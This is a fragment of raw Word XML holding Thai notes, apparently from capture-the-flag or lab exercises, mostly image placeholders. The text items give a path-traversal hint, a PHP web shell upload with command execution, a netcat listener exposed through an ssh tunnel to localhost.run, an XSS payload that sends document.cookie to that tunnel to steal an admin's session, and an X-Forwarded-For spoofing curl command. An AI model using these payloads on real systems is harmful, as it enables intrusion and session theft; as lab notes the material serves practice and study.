      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3D2D5E19" w:rsidP="3D2D5E19" w:rsidRDefault="3D2D5E19" w14:paraId="2234351E" w14:textId="0675858F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3D2D5E19" w:rsidP="3D2D5E19" w:rsidRDefault="3D2D5E19" w14:paraId="192C243F" w14:textId="554A7950">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3D2D5E19" w:rsidP="3D2D5E19" w:rsidRDefault="3D2D5E19" w14:paraId="29402960" w14:textId="48E650A4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="352370A3">
        <w:rPr/>
        <w:t>137</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E66A112" w:rsidP="3D2D5E19" w:rsidRDefault="1E66A112" w14:paraId="519E2BFC" w14:textId="323EFC99">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1E66A112">
        <w:drawing>
          <wp:inline wp14:editId="1AE958CB" wp14:anchorId="585C64AC">
            <wp:extent cx="4930567" cy="5311600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="579490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490688" name="Picture 579490688"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1393687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6A112" w:rsidP="3D2D5E19" w:rsidRDefault="1E66A112" w14:paraId="4CBD4007" w14:textId="38F8637C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1E66A112">
        <w:drawing>
          <wp:inline wp14:editId="594EC4B6" wp14:anchorId="0442FF93">
            <wp:extent cx="4701947" cy="2446232"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="518162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162036" name="Picture 518162036"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId70971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4C534" w:rsidP="3D2D5E19" w:rsidRDefault="1894C534" w14:paraId="2EA0A0B6" w14:textId="40B899F0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1894C534">
        <w:rPr/>
        <w:t>---------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1894C534" w:rsidP="3D2D5E19" w:rsidRDefault="1894C534" w14:paraId="2480E3BF" w14:textId="5501FC3E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1894C534">
        <w:rPr/>
        <w:t>139</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="717DE69A" w:rsidP="3D2D5E19" w:rsidRDefault="717DE69A" w14:paraId="1DD5CF1C" w14:textId="2650AF4C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="717DE69A">
        <w:drawing>
          <wp:inline wp14:editId="60420248" wp14:anchorId="5A7CB906">
            <wp:extent cx="4801016" cy="3977985"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="66797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97400" name="Picture 66797400"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId485582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DE69A" w:rsidP="3D2D5E19" w:rsidRDefault="717DE69A" w14:paraId="6AA4A8E9" w14:textId="73CD17B7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="717DE69A">
        <w:drawing>
          <wp:inline wp14:editId="6E80B74A" wp14:anchorId="7E0783C8">
            <wp:extent cx="4778154" cy="4938188"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1135889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889852" name="Picture 1135889852"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId442784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DE69A" w:rsidP="3D2D5E19" w:rsidRDefault="717DE69A" w14:paraId="558121D5" w14:textId="382A4944">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="717DE69A">
        <w:drawing>
          <wp:inline wp14:editId="4429FDA4" wp14:anchorId="0D704735">
            <wp:extent cx="4709568" cy="4465707"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1701806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806184" name="Picture 1701806184"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1219597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DBB6D" w:rsidP="3D2D5E19" w:rsidRDefault="497DBB6D" w14:paraId="5B7153CD" w14:textId="1CD10893">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="497DBB6D">
        <w:rPr/>
        <w:t>144</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="497DBB6D" w:rsidP="3D2D5E19" w:rsidRDefault="497DBB6D" w14:paraId="3F0ACC48" w14:textId="3BC02640">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="497DBB6D">
        <w:rPr/>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidR="497DBB6D">
        <w:rPr/>
        <w:t>/..</w:t>
      </w:r>
      <w:r w:rsidR="497DBB6D">
        <w:rPr/>
        <w:t xml:space="preserve">/ path </w:t>
      </w:r>
      <w:r w:rsidR="497DBB6D">
        <w:rPr/>
        <w:t>ที่</w:t>
      </w:r>
      <w:r w:rsidR="497DBB6D">
        <w:rPr/>
        <w:t xml:space="preserve"> flag อยู่</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DCFB8AD" w:rsidP="3D2D5E19" w:rsidRDefault="4DCFB8AD" w14:paraId="05A87806" w14:textId="334477E5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4DCFB8AD">
        <w:rPr/>
        <w:t>-------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DCFB8AD" w:rsidP="3D2D5E19" w:rsidRDefault="4DCFB8AD" w14:paraId="59F78558" w14:textId="37A8D06A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4DCFB8AD">
        <w:rPr/>
        <w:t>145</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04962E6E" w:rsidP="3D2D5E19" w:rsidRDefault="04962E6E" w14:paraId="2BCBB104" w14:textId="5292D5DE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="04962E6E">
        <w:rPr/>
        <w:t>อัพโหลด</w:t>
      </w:r>
      <w:r w:rsidR="04962E6E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="04962E6E">
        <w:rPr/>
        <w:t>shell.php</w:t>
      </w:r>
      <w:r w:rsidR="04962E6E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="04962E6E">
        <w:rPr/>
        <w:t>แล้ว</w:t>
      </w:r>
      <w:r w:rsidR="04962E6E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="04962E6E">
        <w:rPr/>
        <w:t>ก็เข้า</w:t>
      </w:r>
      <w:r w:rsidR="1303FC59">
        <w:rPr/>
        <w:t>shellด้วยpath</w:t>
      </w:r>
      <w:r w:rsidR="1303FC59">
        <w:rPr/>
        <w:t xml:space="preserve">  /</w:t>
      </w:r>
      <w:r w:rsidR="1303FC59">
        <w:rPr/>
        <w:t>shell.php?cmd</w:t>
      </w:r>
      <w:r w:rsidR="1303FC59">
        <w:rPr/>
        <w:t>= pwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1303FC59" w:rsidP="3D2D5E19" w:rsidRDefault="1303FC59" w14:paraId="4D245574" w14:textId="15B16AF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="285" w:lineRule="auto"/>
      </w:pP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system</w:t>
      </w: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$_GET</w:t>
      </w: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"cmd"</w:t>
      </w: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3D2D5E19" w:rsidR="1303FC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49831DC0" w:rsidP="3D2D5E19" w:rsidRDefault="49831DC0" w14:paraId="7076912E" w14:textId="1C1E582E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="49831DC0">
        <w:rPr/>
        <w:t>หน้า</w:t>
      </w:r>
      <w:r w:rsidR="1303FC59">
        <w:rPr/>
        <w:t>ตางี้ shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FC6CA1B" w:rsidP="3D2D5E19" w:rsidRDefault="2FC6CA1B" w14:paraId="6783C849" w14:textId="3E0CBE24">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t>-----------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FC6CA1B" w:rsidP="3D2D5E19" w:rsidRDefault="2FC6CA1B" w14:paraId="1DB90853" w14:textId="2E02E2FF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t>146</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FC6CA1B" w:rsidP="3D2D5E19" w:rsidRDefault="2FC6CA1B" w14:paraId="3FB84091" w14:textId="41F97CB9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t>เปิด</w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t xml:space="preserve"> เซิฟ1 </w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t>lvp</w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t xml:space="preserve"> 8080 </w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t>เปิด</w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t xml:space="preserve"> เซิฟ2 ssh -R 80:localhost:8080 </w:t>
      </w:r>
      <w:hyperlink r:id="R3d86f47ee78b41c0">
        <w:r w:rsidRPr="3D2D5E19" w:rsidR="2FC6CA1B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>nokey@localhost.run</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t xml:space="preserve">จได้ลิ้ง </w:t>
      </w:r>
      <w:hyperlink r:id="R0cb626b33d034cd1">
        <w:r w:rsidRPr="3D2D5E19" w:rsidR="2FC6CA1B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://75fd02df267015.lhr.life</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t>แต่ห้ามกดเข้าใช้ได้ครั้งเดียว</w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t xml:space="preserve"> ไม่งั้นต้องเปิดใหม่</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FC6CA1B" w:rsidP="3D2D5E19" w:rsidRDefault="2FC6CA1B" w14:paraId="0C79E58A" w14:textId="3BDB7DDE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t>เอาไปประกอบกับ</w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t>xss</w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t xml:space="preserve"> ข้างล่า</w:t>
      </w:r>
      <w:r w:rsidR="6C470A5F">
        <w:rPr/>
        <w:t>ง</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="76D0F817" w:rsidP="3D2D5E19" w:rsidRDefault="76D0F817" w14:paraId="5B64E23E" w14:textId="462B8B66">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="76D0F817">
        <w:rPr/>
        <w:t>&lt;script&gt;new Image().</w:t>
      </w:r>
      <w:r w:rsidR="76D0F817">
        <w:rPr/>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidR="76D0F817">
        <w:rPr/>
        <w:t>="https://</w:t>
      </w:r>
      <w:r w:rsidR="76D0F817">
        <w:rPr/>
        <w:t>URL_ใหม่</w:t>
      </w:r>
      <w:r w:rsidR="76D0F817">
        <w:rPr/>
        <w:t>/?c="+</w:t>
      </w:r>
      <w:r w:rsidR="76D0F817">
        <w:rPr/>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r w:rsidR="76D0F817">
        <w:rPr/>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FC6CA1B" w:rsidP="3D2D5E19" w:rsidRDefault="2FC6CA1B" w14:paraId="339DBB9C" w14:textId="2A01B293">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t>แล้วรออย่ากดเข้า</w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t xml:space="preserve"> support </w:t>
      </w:r>
      <w:r w:rsidR="2FC6CA1B">
        <w:rPr/>
        <w:t>รอจนมี</w:t>
      </w:r>
      <w:r w:rsidR="605016EB">
        <w:rPr/>
        <w:t xml:space="preserve"> admin </w:t>
      </w:r>
      <w:r w:rsidR="605016EB">
        <w:rPr/>
        <w:t>เข้ามาแล้วจะได้</w:t>
      </w:r>
      <w:r w:rsidR="605016EB">
        <w:rPr/>
        <w:t xml:space="preserve"> cookies</w:t>
      </w:r>
      <w:r w:rsidR="08C0461F">
        <w:rPr/>
        <w:t xml:space="preserve"> ของ admin </w:t>
      </w:r>
      <w:r w:rsidR="08C0461F">
        <w:rPr/>
        <w:t>มา</w:t>
      </w:r>
      <w:r w:rsidR="08C0461F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="08C0461F">
        <w:rPr/>
        <w:t>ก็</w:t>
      </w:r>
      <w:r w:rsidR="08C0461F">
        <w:rPr/>
        <w:t xml:space="preserve"> f12 </w:t>
      </w:r>
      <w:r w:rsidR="08C0461F">
        <w:rPr/>
        <w:t>เอา</w:t>
      </w:r>
      <w:r w:rsidR="08C0461F">
        <w:rPr/>
        <w:t xml:space="preserve"> cookies </w:t>
      </w:r>
      <w:r w:rsidR="08C0461F">
        <w:rPr/>
        <w:t>ไปใส่แล้วหดไปหน้า</w:t>
      </w:r>
      <w:r w:rsidR="08C0461F">
        <w:rPr/>
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3D2D5E19" w:rsidP="3D2D5E19" w:rsidRDefault="3D2D5E19" w14:paraId="2EDFF070" w14:textId="0CDBBEC9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="57EED9EF" w:rsidP="3D2D5E19" w:rsidRDefault="57EED9EF" w14:paraId="5C5A7E50" w14:textId="717C0884">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="57EED9EF">
        <w:drawing>
          <wp:inline wp14:editId="77761865" wp14:anchorId="7CB3599B">
            <wp:extent cx="5943600" cy="2324109"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1681793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793615" name="Picture 1681793615"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1705017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0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FE2892">
        <w:rPr/>
        <w:t>--------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="29BE5877" w:rsidP="3D2D5E19" w:rsidRDefault="29BE5877" w14:paraId="0F007D26" w14:textId="6A357BE8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="29BE5877">
        <w:rPr/>
        <w:t>147</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="29BE5877" w:rsidP="3D2D5E19" w:rsidRDefault="29BE5877" w14:paraId="1116D212" w14:textId="79F10918">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="29BE5877">
        <w:rPr/>
        <w:t xml:space="preserve">curl -H "X-Forwarded-For: </w:t>
      </w:r>
      <w:r w:rsidR="4A69FA0A">
        <w:rPr/>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="29BE5877">
        <w:rPr/>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:hyperlink r:id="R136732d7f2de4575">
        <w:r w:rsidRPr="3D2D5E19" w:rsidR="29BE5877">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://target-ip/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="53E05778" w:rsidP="3D2D5E19" w:rsidRDefault="53E05778" w14:paraId="263561A2" w14:textId="5FB67193">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="53E05778">
        <w:rPr/>
        <w:t>------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53E05778" w:rsidP="3D2D5E19" w:rsidRDefault="53E05778" w14:paraId="1539F382" w14:textId="373A0680">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="53E05778">
        <w:rPr/>
        <w:t>149</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="23A320D5">
        <w:drawing>
          <wp:inline wp14:editId="297D5656" wp14:anchorId="6A735829">
            <wp:extent cx="4747672" cy="5159187"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="699970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970680" name="Picture 699970680"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2043062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2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320D5" w:rsidP="3D2D5E19" w:rsidRDefault="23A320D5" w14:paraId="29B61D60" w14:textId="195A597D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="23A320D5">
        <w:drawing>
          <wp:inline wp14:editId="62833228" wp14:anchorId="6D0D12AA">
            <wp:extent cx="4747672" cy="2751058"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="611813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813615" name="Picture 611813615"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId166101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320D5" w:rsidP="3D2D5E19" w:rsidRDefault="23A320D5" w14:paraId="6B3798B1" w14:textId="0D5500A8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="23A320D5">
        <w:drawing>
          <wp:inline wp14:editId="51166D71" wp14:anchorId="52B19253">
            <wp:extent cx="4854361" cy="4694327"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="836715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715549" name="Picture 836715549"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId732439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320D5" w:rsidP="3D2D5E19" w:rsidRDefault="23A320D5" w14:paraId="27A923C6" w14:textId="7E636B98">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="23A320D5">
        <w:drawing>
          <wp:inline wp14:editId="57DA5071" wp14:anchorId="35FC6AE9">
            <wp:extent cx="4846740" cy="5014395"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="792137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137080" name="Picture 792137080"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2085794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DD95" w:rsidP="3D2D5E19" w:rsidRDefault="3874DD95" w14:paraId="68729BB6" w14:textId="7493BF7B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3874DD95">
        <w:rPr/>
        <w:t>155</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3874DD95" w:rsidP="3D2D5E19" w:rsidRDefault="3874DD95" w14:paraId="343AC05D" w14:textId="0AED0C91">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3874DD95">
        <w:drawing>
          <wp:inline wp14:editId="2834A838" wp14:anchorId="2F19DE2F">
            <wp:extent cx="4701947" cy="4557155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="106437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37547" name="Picture 106437547"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1218751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DD95" w:rsidP="3D2D5E19" w:rsidRDefault="3874DD95" w14:paraId="1CAC9C9E" w14:textId="5F69477E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3874DD95">
        <w:drawing>
          <wp:inline wp14:editId="5C25AB84" wp14:anchorId="5D8EA512">
            <wp:extent cx="4656223" cy="3856054"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1733748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748167" name="Picture 1733748167"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1678744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DD95" w:rsidP="3D2D5E19" w:rsidRDefault="3874DD95" w14:paraId="02FE32FC" w14:textId="1A6490B9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3874DD95">
        <w:drawing>
          <wp:inline wp14:editId="61473D31" wp14:anchorId="7F913007">
            <wp:extent cx="4816257" cy="3696020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2014222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222453" name="Picture 2014222453"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1849286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DD95" w:rsidP="3D2D5E19" w:rsidRDefault="3874DD95" w14:paraId="5A6F376F" w14:textId="3E359CA3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3874DD95">
        <w:drawing>
          <wp:inline wp14:editId="0ABB019C" wp14:anchorId="53DAFCE6">
            <wp:extent cx="4740051" cy="4473328"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="678549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49845" name="Picture 678549845"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1529876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74DD95">
        <w:drawing>
          <wp:inline wp14:editId="6DEE3D4A" wp14:anchorId="71949380">
            <wp:extent cx="4816257" cy="4816257"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2005135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135597" name="Picture 2005135597"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1952427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DD95" w:rsidP="3D2D5E19" w:rsidRDefault="3874DD95" w14:paraId="4D9D46E7" w14:textId="4083171D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3874DD95">
        <w:drawing>
          <wp:inline wp14:editId="3808C17B" wp14:anchorId="59EDA4C4">
            <wp:extent cx="4618120" cy="4961050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1482022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022264" name="Picture 1482022264"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId869429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D3241F"/>
    <w:rsid w:val="03ED5B9A"/>
    <w:rsid w:val="042DBA7A"/>
    <w:rsid w:val="042DBA7A"/>
    <w:rsid w:val="044AE521"/>
    <w:rsid w:val="04683DFE"/>
    <w:rsid w:val="04683DFE"/>
    <w:rsid w:val="04962E6E"/>
    <w:rsid w:val="05FE2892"/>
    <w:rsid w:val="0698C37C"/>
    <w:rsid w:val="074FFD75"/>
    <w:rsid w:val="0838D94B"/>
    <w:rsid w:val="08C0461F"/>
    <w:rsid w:val="0A37E45E"/>
    <w:rsid w:val="0BF5EC5C"/>
    <w:rsid w:val="0D258497"/>
    <w:rsid w:val="0EACEA02"/>
    <w:rsid w:val="0F2166B6"/>
    <w:rsid w:val="11295820"/>
    <w:rsid w:val="119DD768"/>
    <w:rsid w:val="119DD768"/>
    <w:rsid w:val="128AA603"/>
    <w:rsid w:val="1303FC59"/>
    <w:rsid w:val="15B16388"/>
    <w:rsid w:val="17E3BB15"/>
    <w:rsid w:val="17F3D229"/>
    <w:rsid w:val="1894C534"/>
    <w:rsid w:val="18AA32FC"/>
    <w:rsid w:val="1A5DE210"/>
    <w:rsid w:val="1B387C21"/>
    <w:rsid w:val="1B3EF353"/>
    <w:rsid w:val="1C3883F3"/>
    <w:rsid w:val="1CB2A0E6"/>
    <w:rsid w:val="1CCD5FD9"/>
    <w:rsid w:val="1E325242"/>
    <w:rsid w:val="1E66A112"/>
    <w:rsid w:val="1E732A41"/>
    <w:rsid w:val="1EAD4443"/>
    <w:rsid w:val="1F3C34A6"/>
    <w:rsid w:val="20580276"/>
    <w:rsid w:val="209D4ABD"/>
    <w:rsid w:val="2257F997"/>
    <w:rsid w:val="23A320D5"/>
    <w:rsid w:val="25DCD12C"/>
    <w:rsid w:val="26BFA188"/>
    <w:rsid w:val="27E0DEB1"/>
    <w:rsid w:val="282439EA"/>
    <w:rsid w:val="29BE5877"/>
    <w:rsid w:val="2B88BEE6"/>
    <w:rsid w:val="2BCE1B18"/>
    <w:rsid w:val="2D4CDA09"/>
    <w:rsid w:val="2DE99756"/>
    <w:rsid w:val="2F7C1027"/>
    <w:rsid w:val="2FC6CA1B"/>
    <w:rsid w:val="31943689"/>
    <w:rsid w:val="31E48551"/>
    <w:rsid w:val="352370A3"/>
    <w:rsid w:val="3550A8F4"/>
    <w:rsid w:val="37BA3378"/>
    <w:rsid w:val="3874DD95"/>
    <w:rsid w:val="3D2D5E19"/>
    <w:rsid w:val="3D359793"/>
    <w:rsid w:val="3DAA4E4F"/>
    <w:rsid w:val="3ED8BE24"/>
    <w:rsid w:val="3ED8BE24"/>
    <w:rsid w:val="406960F7"/>
    <w:rsid w:val="40A97EC7"/>
    <w:rsid w:val="40D6457B"/>
    <w:rsid w:val="42C6B72B"/>
    <w:rsid w:val="431EA90B"/>
    <w:rsid w:val="4423C8D3"/>
    <w:rsid w:val="46554B19"/>
    <w:rsid w:val="46554B19"/>
    <w:rsid w:val="46FB56AE"/>
    <w:rsid w:val="497DBB6D"/>
    <w:rsid w:val="49831DC0"/>
    <w:rsid w:val="49B72534"/>
    <w:rsid w:val="4A1DDA3A"/>
    <w:rsid w:val="4A69FA0A"/>
    <w:rsid w:val="4A6A0E84"/>
    <w:rsid w:val="4BBC2508"/>
    <w:rsid w:val="4C93A18D"/>
    <w:rsid w:val="4DCFB8AD"/>
    <w:rsid w:val="4FEC8C33"/>
    <w:rsid w:val="53E05778"/>
    <w:rsid w:val="552F0E6B"/>
    <w:rsid w:val="56E9D5BA"/>
    <w:rsid w:val="57DB8CFA"/>
    <w:rsid w:val="57EED9EF"/>
    <w:rsid w:val="590E4C1D"/>
    <w:rsid w:val="5AA1CB17"/>
    <w:rsid w:val="5ADC93C5"/>
    <w:rsid w:val="5ADC93C5"/>
    <w:rsid w:val="5ADF90F8"/>
    <w:rsid w:val="5AE50201"/>
    <w:rsid w:val="5E682C61"/>
